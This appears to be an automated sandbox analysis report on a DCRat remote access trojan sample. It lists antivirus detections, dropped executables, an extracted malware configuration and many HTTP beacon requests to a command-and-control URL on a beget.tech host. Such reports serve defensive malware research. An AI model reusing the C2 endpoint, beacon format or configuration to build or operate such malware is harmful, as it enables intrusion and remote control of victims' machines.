Source: http://arabna4a.beget.tech/L1nc0In.php?BbgPmrREGT0y5DQp73CC1=ZUJgx0hpXQufn9IoPZ0hIbOJQ8t&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&BbgPmrREGT0y5DQp73CC1=ZUJgx0hpXQufn9IoPZ0hIbOJQ8t	Avira URL Cloud: Label: malware
Source: http://arabna4a.beget.tech/L1nc0In.php?WKvP6A2Jn=stWSjLwNRGLKoK&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&WKvP6A2Jn=stWSjLwNRGLKoK	Avira URL Cloud: Label: malware
Source: http://arabna4a.beget.tech/	Avira URL Cloud: Label: malware
Source: http://arabna4a.beget.tech/L1nc0In.php?XuV9nTU0UPEK42MPVtkxIO=l5DIGMVlApaiv&UwLFN=he96MM2hRMugIXuEkLNo8nEf&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&XuV9nTU0UPEK42MPVtkxIO=l5DIGMVlApaiv&UwLFN=he96MM2hRMugIXuEkLNo8nEf	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Recovery\smartscreen.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Recovery\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\user\AppData\Local\Temp\4df10f3f-bad6-4e3d-936c-dcca7df15912.vbs	Avira: detection malicious, Label: VBS/Starter.VPVT
Source: C:\Users\user\AppData\Local\Temp\1b0abb92-7d29-4daf-9add-af674e63510b.vbs	Avira: detection malicious, Label: VBS/Runner.VPXJ
Source: C:\Users\user\AppData\Local\Temp\13e405ee8ccedfb794a39e44ce97157ba9c943c9.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984

Found malware configuration

Source: 00000000.00000002.1364796894.000000001333D000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: DCRat {"SCRT": "{\"J\":\">\",\"b\":\"(\",\"6\":\"&\",\"C\":\"~\",\"d\":\")\",\"i\":\"-\",\"Q\":\"@\",\"o\":\"<\",\"W\":\"%\",\"M\":\" \",\"A\":\".\",\"L\":\"|\",\"Z\":\"^\",\"R\":\"$\",\"y\":\";\",\"F\":\"*\",\"0\":\"_\",\"P\":\",\",\"U\":\"#\",\"Y\":\"`\",\"X\":\"!\"}", "PCRT": "{\"T\":\"~\",\"J\":\"&\",\"U\":\"!\",\"F\":\"%\",\"d\":\"@\",\"2\":\"(\",\"c\":\"-\",\"R\":\"$\",\"V\":\" \",\"y\":\";\",\"B\":\"<\",\"Q\":\"_\",\"Y\":\"`\",\"S\":\".\",\"l\":\"|\",\"G\":\"*\",\"X\":\")\",\"I\":\",\",\"q\":\">\",\"o\":\"^\",\"Z\":\"#\"}", "TAG": "", "MUTEX": "DCR_MUTEX-gCdxOjrIZmFwPnRzH9X5", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 2, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false}

Multi AV Scanner detection for dropped file

Source: C:\Recovery\smartscreen.exe	ReversingLabs: Detection: 78%
Source: C:\Recovery\vAJjQbsDlJtvByBkfqttADkNAptf.exe	ReversingLabs: Detection: 78%
Source: C:\Users\user\AppData\Local\Temp\13e405ee8ccedfb794a39e44ce97157ba9c943c9.exe	ReversingLabs: Detection: 78%
Source: C:\Users\user\Music\ApplicationFrameHost.exe	ReversingLabs: Detection: 78%
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	ReversingLabs: Detection: 78%
Source: C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe	ReversingLabs: Detection: 78%

Multi AV Scanner detection for submitted file

Source: cvXu2RR10n.exe	Virustotal: Detection: 67%			Perma Link
Source: cvXu2RR10n.exe	ReversingLabs: Detection: 78%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Recovery\smartscreen.exe	Joe Sandbox ML: detected
Source: C:\Recovery\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\13e405ee8ccedfb794a39e44ce97157ba9c943c9.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: cvXu2RR10n.exe

Joe Sandbox ML: detected

Source: cvXu2RR10n.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: cvXu2RR10n.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdbU.o. a._CorDllMainmscoree.dll source: cvXu2RR10n.exe, 00000000.00000002.1327020968.0000000003310000.00000004.08000000.00040000.00000000.sdmp, cvXu2RR10n.exe, 00000000.00000002.1329052019.000000000352D000.00000004.00000800.00020000.00000000.sdmp, ApplicationFrameHost.exe, 00000032.00000002.1437153809.00000000034DF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdb source: cvXu2RR10n.exe, 00000000.00000002.1327020968.0000000003310000.00000004.08000000.00040000.00000000.sdmp, cvXu2RR10n.exe, 00000000.00000002.1329052019.000000000352D000.00000004.00000800.00020000.00000000.sdmp, ApplicationFrameHost.exe, 00000032.00000002.1437153809.00000000034DF000.00000004.00000800.00020000.00000000.sdmp

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.7:49743 -> 5.101.153.201:80
Source: Network traffic	Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.7:49957 -> 5.101.153.201:80
Source: Network traffic	Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.7:49896 -> 5.101.153.201:80
Source: Network traffic	Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.7:49983 -> 5.101.153.201:80
Source: Network traffic	Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.7:49980 -> 5.101.153.201:80
Source: Network traffic	Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.7:49979 -> 5.101.153.201:80
Source: Network traffic	Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.7:49981 -> 5.101.153.201:80
Source: Network traffic	Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.7:49982 -> 5.101.153.201:80
Source: Network traffic	Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.7:49985 -> 5.101.153.201:80
Source: Network traffic	Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.7:49984 -> 5.101.153.201:80

Source: Joe Sandbox View

ASN Name: BEGET-ASRU BEGET-ASRU

Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?BbgPmrREGT0y5DQp73CC1=ZUJgx0hpXQufn9IoPZ0hIbOJQ8t&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&BbgPmrREGT0y5DQp73CC1=ZUJgx0hpXQufn9IoPZ0hIbOJQ8t HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: arabna4a.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?BbgPmrREGT0y5DQp73CC1=ZUJgx0hpXQufn9IoPZ0hIbOJQ8t&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&BbgPmrREGT0y5DQp73CC1=ZUJgx0hpXQufn9IoPZ0hIbOJQ8t HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: arabna4a.beget.tech
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?WKvP6A2Jn=stWSjLwNRGLKoK&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&WKvP6A2Jn=stWSjLwNRGLKoK HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: arabna4a.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?WKvP6A2Jn=stWSjLwNRGLKoK&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&WKvP6A2Jn=stWSjLwNRGLKoK HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: arabna4a.beget.tech
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?VP=Y0sUyEySXbH7qzhU&uKbMX6B06ERe3aQWDvs=Bo&ams92FdC1fIRKyQB4rd2=hxdB0kmEyUiFiAjo6IucBZ8uJFiwtyT&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&VP=Y0sUyEySXbH7qzhU&uKbMX6B06ERe3aQWDvs=Bo&ams92FdC1fIRKyQB4rd2=hxdB0kmEyUiFiAjo6IucBZ8uJFiwtyT HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: arabna4a.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?VP=Y0sUyEySXbH7qzhU&uKbMX6B06ERe3aQWDvs=Bo&ams92FdC1fIRKyQB4rd2=hxdB0kmEyUiFiAjo6IucBZ8uJFiwtyT&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&VP=Y0sUyEySXbH7qzhU&uKbMX6B06ERe3aQWDvs=Bo&ams92FdC1fIRKyQB4rd2=hxdB0kmEyUiFiAjo6IucBZ8uJFiwtyT HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: arabna4a.beget.tech
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ouI9hzqbhep5GUmX0eUaWez4Lojvj=luzWjVi&AAhu=RU&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&ouI9hzqbhep5GUmX0eUaWez4Lojvj=luzWjVi&AAhu=RU HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: arabna4a.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ouI9hzqbhep5GUmX0eUaWez4Lojvj=luzWjVi&AAhu=RU&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&ouI9hzqbhep5GUmX0eUaWez4Lojvj=luzWjVi&AAhu=RU HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: arabna4a.beget.tech
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?XuV9nTU0UPEK42MPVtkxIO=l5DIGMVlApaiv&UwLFN=he96MM2hRMugIXuEkLNo8nEf&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&XuV9nTU0UPEK42MPVtkxIO=l5DIGMVlApaiv&UwLFN=he96MM2hRMugIXuEkLNo8nEf HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: arabna4a.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?XuV9nTU0UPEK42MPVtkxIO=l5DIGMVlApaiv&UwLFN=he96MM2hRMugIXuEkLNo8nEf&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&XuV9nTU0UPEK42MPVtkxIO=l5DIGMVlApaiv&UwLFN=he96MM2hRMugIXuEkLNo8nEf HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: arabna4a.beget.tech
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?2ClU1mdy4=ibGGARR9W&WIeFFV2nEILd0=5WNPuSwrjKZ9lMVmIpUY2tifOgt0&wEEkOKnEBPEkojTqGtqRc9gJ=9LyrBNj68wGVZXB&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&2ClU1mdy4=ibGGARR9W&WIeFFV2nEILd0=5WNPuSwrjKZ9lMVmIpUY2tifOgt0&wEEkOKnEBPEkojTqGtqRc9gJ=9LyrBNj68wGVZXB HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: arabna4a.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?2ClU1mdy4=ibGGARR9W&WIeFFV2nEILd0=5WNPuSwrjKZ9lMVmIpUY2tifOgt0&wEEkOKnEBPEkojTqGtqRc9gJ=9LyrBNj68wGVZXB&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&2ClU1mdy4=ibGGARR9W&WIeFFV2nEILd0=5WNPuSwrjKZ9lMVmIpUY2tifOgt0&wEEkOKnEBPEkojTqGtqRc9gJ=9LyrBNj68wGVZXB HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: arabna4a.beget.tech
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?AhHKH=fcLr25XP3&5CesUO1hd=ucygGzIqU8tu5qFr&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&AhHKH=fcLr25XP3&5CesUO1hd=ucygGzIqU8tu5qFr HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: arabna4a.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?AhHKH=fcLr25XP3&5CesUO1hd=ucygGzIqU8tu5qFr&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&AhHKH=fcLr25XP3&5CesUO1hd=ucygGzIqU8tu5qFr HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: arabna4a.beget.tech
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?gXDzKre6VVRBWAoGI=jPJ3UfJdDNtSj71Mwf&5qI3u1xRIQeSri2anXnDhproQ=CwUJKOJU&2aVYBgOB=j5BurgOz&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&gXDzKre6VVRBWAoGI=jPJ3UfJdDNtSj71Mwf&5qI3u1xRIQeSri2anXnDhproQ=CwUJKOJU&2aVYBgOB=j5BurgOz HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: arabna4a.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?gXDzKre6VVRBWAoGI=jPJ3UfJdDNtSj71Mwf&5qI3u1xRIQeSri2anXnDhproQ=CwUJKOJU&2aVYBgOB=j5BurgOz&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&gXDzKre6VVRBWAoGI=jPJ3UfJdDNtSj71Mwf&5qI3u1xRIQeSri2anXnDhproQ=CwUJKOJU&2aVYBgOB=j5BurgOz HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: arabna4a.beget.tech
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?2ClU1mdy4=ibGGARR9W&WIeFFV2nEILd0=5WNPuSwrjKZ9lMVmIpUY2tifOgt0&wEEkOKnEBPEkojTqGtqRc9gJ=9LyrBNj68wGVZXB&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&2ClU1mdy4=ibGGARR9W&WIeFFV2nEILd0=5WNPuSwrjKZ9lMVmIpUY2tifOgt0&wEEkOKnEBPEkojTqGtqRc9gJ=9LyrBNj68wGVZXB HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: arabna4a.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?2ClU1mdy4=ibGGARR9W&WIeFFV2nEILd0=5WNPuSwrjKZ9lMVmIpUY2tifOgt0&wEEkOKnEBPEkojTqGtqRc9gJ=9LyrBNj68wGVZXB&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&2ClU1mdy4=ibGGARR9W&WIeFFV2nEILd0=5WNPuSwrjKZ9lMVmIpUY2tifOgt0&wEEkOKnEBPEkojTqGtqRc9gJ=9LyrBNj68wGVZXB HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: arabna4a.beget.tech
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?n6h7L24FVf9j22S6=KanaE3aKNLBhD&FI3Wr790F1Otj5zl=Xh6n50&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&n6h7L24FVf9j22S6=KanaE3aKNLBhD&FI3Wr790F1Otj5zl=Xh6n50 HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: arabna4a.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?n6h7L24FVf9j22S6=KanaE3aKNLBhD&FI3Wr790F1Otj5zl=Xh6n50&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&n6h7L24FVf9j22S6=KanaE3aKNLBhD&FI3Wr790F1Otj5zl=Xh6n50 HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: arabna4a.beget.tech

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?BbgPmrREGT0y5DQp73CC1=ZUJgx0hpXQufn9IoPZ0hIbOJQ8t&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&BbgPmrREGT0y5DQp73CC1=ZUJgx0hpXQufn9IoPZ0hIbOJQ8t HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: arabna4a.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?BbgPmrREGT0y5DQp73CC1=ZUJgx0hpXQufn9IoPZ0hIbOJQ8t&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&BbgPmrREGT0y5DQp73CC1=ZUJgx0hpXQufn9IoPZ0hIbOJQ8t HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: arabna4a.beget.tech
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?WKvP6A2Jn=stWSjLwNRGLKoK&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&WKvP6A2Jn=stWSjLwNRGLKoK HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: arabna4a.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?WKvP6A2Jn=stWSjLwNRGLKoK&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&WKvP6A2Jn=stWSjLwNRGLKoK HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: arabna4a.beget.tech
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?VP=Y0sUyEySXbH7qzhU&uKbMX6B06ERe3aQWDvs=Bo&ams92FdC1fIRKyQB4rd2=hxdB0kmEyUiFiAjo6IucBZ8uJFiwtyT&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&VP=Y0sUyEySXbH7qzhU&uKbMX6B06ERe3aQWDvs=Bo&ams92FdC1fIRKyQB4rd2=hxdB0kmEyUiFiAjo6IucBZ8uJFiwtyT HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: arabna4a.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?VP=Y0sUyEySXbH7qzhU&uKbMX6B06ERe3aQWDvs=Bo&ams92FdC1fIRKyQB4rd2=hxdB0kmEyUiFiAjo6IucBZ8uJFiwtyT&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&VP=Y0sUyEySXbH7qzhU&uKbMX6B06ERe3aQWDvs=Bo&ams92FdC1fIRKyQB4rd2=hxdB0kmEyUiFiAjo6IucBZ8uJFiwtyT HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: arabna4a.beget.tech
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ouI9hzqbhep5GUmX0eUaWez4Lojvj=luzWjVi&AAhu=RU&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&ouI9hzqbhep5GUmX0eUaWez4Lojvj=luzWjVi&AAhu=RU HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: arabna4a.beget.techConnection: Keep-Alive
